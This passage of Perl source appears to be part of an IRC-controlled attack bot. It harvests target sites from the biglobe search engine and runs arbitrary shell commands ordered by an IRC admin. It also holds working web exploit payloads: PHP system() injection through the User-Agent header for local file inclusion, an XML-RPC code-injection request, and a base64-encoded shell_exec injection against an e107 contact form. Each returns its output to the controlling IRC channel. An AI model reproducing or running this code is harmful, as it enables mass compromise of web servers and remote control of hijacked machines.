push(@list,@grep);
}
}
}
return @list;
}
sub biglobe {
my $key = $_[0];
my @list;
for ($b=1; $b<=500; $b+=10) {
$num += $num;
my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
my $res = &search_engine_query($search);
while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
my $link = $1;
if ($link !~ /biglobe/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
#########################################
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
push @cln, $element;
}
return @cln;
}
sub links() {
my @list;
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
push(@list,$host,$hdir);
return @list;
}
sub search_engine_query() {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ($query eq "") { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
my $sget = "GET $query HTTP/1.0\r\n";
$sget .= "Host: $host\r\n";
$sget .= "Accept: */*\r\n";
$sget .= "User-Agent: $uagent\r\n";
$sget .= "Connetion: Close\r\n\r\n";
print $sock $sget;
my @pages = <$sock>;
$page = "@pages";
close($sock);
};
return $page;
}
#########################################
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","No such file or directory");
return;
}
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 3; }
}
exit;
}}
}
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}
sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}
sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $chan = $_[2];
my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /lobex(.*)byroe/s) {
&msg("$chan","$lfilogo9 ".$1." ");
} else {
&msg("$chan","$lfilogo15 No Output ");
}
}
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $chan = $_[2];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","$xmllogo9 $1 ");
} else {
&msg("$chan","$xmllogo15 No Output ");
}
}
sub cmde107() {
my $path = $_[0];
my $code = $_[1];
my $chan = $_[2];
my $codecmd = encode_base64($code);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
my $req = HTTP::Request->new(POST => $path);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
&msg("$chan","0,1(0E1070)4 $mydata");
}
else { &msg("$chan","0,1(0E1070)4 No Output"); }
}